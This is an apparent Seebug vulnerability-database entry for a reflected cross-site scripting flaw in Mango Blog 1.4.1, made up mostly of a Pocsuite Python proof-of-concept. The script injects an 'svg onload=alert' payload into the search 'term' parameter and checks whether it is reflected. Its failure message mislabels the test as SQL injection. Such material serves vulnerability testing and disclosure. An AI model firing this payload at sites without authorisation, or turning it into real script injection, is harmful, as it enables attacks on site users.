Mango Blog 1.4.1 'archives.cfm/search' Cross Site Scripting Vulnerability

2014-07-01T00:00:00
ID SSV:87080
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register

class TestPOC(POCBase):
    vulID = 'SSV-87080'  # vul ID
    version = '1'
    author = 'fenghh'
    vulDate = '2010-03-03'
    createDate = '2015-10-14'
    updateDate = '2015-10-14'
    references = ['http://www.securityfocus.com/bid/39864/info']
    name = 'Mango Blog 1.4.1 archives.cfm/search Cross Site Scripting Vulnerability'
    appPowerLink = 'http://www.mangoblog.org/'
    appName = 'Mango Blog'
    appVersion = '1.4.1'
    vulType = 'XSS'
    desc = '''  
        Mango Blog没有正确地过滤提交给archives.cfm/search页面的term参数便返回给了用户,
        远程攻击者可以通过提交恶意参数请求执行跨站脚本攻击,导致在用户浏览器会话中执行任意HTML和脚本代码。
    '''
    # the sample sites for examine
    samples = ['']

    def _verify(self):
        output = Output(self)
        result = {}
        payload = '/archives.cfm/search/?term=%3Csvg%20onload=alert(100)%3E'
        verify_url = self.url + payload
        content = req.get(verify_url).content
        if '<svg onload=alert(100)>' in content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = verify_url
            output.success(result)
        else:
            output.fail('SQL Injection Failed')
        return output

    def _attack(self): 
        return self._verify()

register(TestPOC)